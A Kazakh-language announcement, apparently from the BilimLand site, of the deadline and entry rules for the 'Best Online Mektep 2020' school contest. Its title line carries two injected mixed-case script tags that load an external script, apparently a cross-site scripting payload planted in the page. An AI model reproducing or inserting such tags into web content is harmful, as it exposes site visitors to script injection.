«Үздік Online Mektep 2020» республикалық байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
02.11.2020
Назар аударыңыз! 2020 жылдың 5 қарашасында «Үздік Online Mektep 2020» республикалық байқауы аяқталады. Байқауға қатысып үлгеріңіздер! Байқауға қатысу шарттары төменде, сұрақтар туындаған жағдайда, +7 (707) 944 95 95 байланыс нөміріне хабарласуыңызға болады.
Байқау қорытындысы Instagram (@bilimland.kz) және Facebook (BILIM Land) желілеріндегі BilimLand парақшаларында ТІКЕЛЕЙ ЭФИРДЕ анықталады.
Бұл Қазақстанның барлық OnlineMektep платформасына қосылған кез келген мектебіне 15 BilimBook интерактивті панелін ұтып алу үшін ерекше мүмкіндік. Қатысу - ТЕГІН!
Байқауға қатысудың шарттары:
- OnlineMektep.org платформасында келесі мәліметтер толық толтырылған болуы қажет:
● мектептің толық сабақ кестесі (бекітілген пән мұғалімдерімен бірге);
● сабақ пен үй тапсырмасына баға қойылған журнал;
● оқушылар мен ұстаздардың ағымдағы (аккаунттар) тізімі.
- Facebook әлеуметтік желісіне байқауға қатысу туралы постты мектеп әкімшілігі немесе мұғалімдер жариялау керек. Пост келесі мәліметтерден тұру қажет:
2.1 Кем дегенде екі скриншот жасалу қажет: толық толтырылған сабақ кестесі (пән мұғалімдерімен бірге), кез келген сыныптың сабақ пен үй тапсырмасына баға қойылған журналы (оқушының аты-жөнін көрсетудің қажеті жоқ);
2.2 Посттың сипаттамасында қатысушының мектебінде қашықтан оқытудың қалай жүріп жатқаны жайлы қысқаша жазып, #OnlineMektep2020 хэштегін жазып, @BILIM Land парақшасын белгілеуі қажет;
2.3 Қатысушы байқау кезінде Facebook-тегі парақшасы ашық болуы керек;
2.4 Facebook-тегі @BILIM Land парақшасына жазылу қажет.
- Қатысушы @BILIM Land парақшасында көрсетілген Google формасын міндетті түрде толтырып, байқауға тіркелу қажет.
Байқау Bilim Media Group компаниясының ұйымдастыруымен және демеушілігімен өтуде.
Толығырақ сілтеме бойынша өтіп, біле аласыздар:
https://bilimland.kz/kk/news-articles/news/zdik-online-mektep-2020-respublikalyq-bayqauy-bastaldy